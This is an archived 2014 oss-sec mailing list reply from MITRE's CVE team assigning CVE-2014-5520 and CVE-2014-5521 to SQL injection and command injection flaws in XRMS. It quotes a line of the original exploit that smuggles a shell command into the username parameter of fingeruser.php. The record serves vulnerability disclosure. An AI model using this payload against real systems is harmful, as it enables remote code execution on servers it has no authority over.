oss-sec mailing list archives
Re: XRMS SQLi to RCE 0day
From: cve-assign () mitre org
Date: Fri, 29 Aug 2014 05:06:01 -0400 (EDT)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
We get SQL injection via $_SESSION poisoning
Use CVE-2014-5520.
exploit a trivial command injection cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)]) url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
Use CVE-2014-5521. - -- CVE assignment team, MITRE CVE Numbering Authority M/S M300 202 Burlington Road, Bedford, MA 01730 USA [ PGP key available through http://cve.mitre.org/cve/request_id.html ] -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.14 (SunOS) iQEcBAEBAgAGBQJUAEH4AAoJEKllVAevmvmsyX0H/3MDCARe+SyjOC1IGHrZC+sM 66Q3DelGzUBB2kU+lXVaEhibITT19oyKl/k//PbippCJv6sdu2gjcxeKWzatbPK9 6zTxfjdrcidxhp3a5VPJQA9Bk/v0sTwFyjz+RN/p1c/GMQV4oHOp5TNv0GUV10A2 PB3cx0/fCKpRa5EbrsFdxAL3lEAw25KiC1SCSZcrssXGuVJKDcfZJNfmiGs1vDpX TSaULBoe8lLOWr+Xw2az8WOtsh0FX3xhi7Z8ohxnw5AykuJ6Z7CgM875Gj3xM8Tb e76rwNIvPXMI3z7IcdB8ymt0Z8g0oM4v6IdX8z157Ce5c2tG6U/gwsfPmCSQPpo= =Zzco -----END PGP SIGNATURE-----
Current thread:
- XRMS SQLi to RCE 0day Benjamin Harris (Aug 27)
- Re: XRMS SQLi to RCE 0day cve-assign (Aug 29)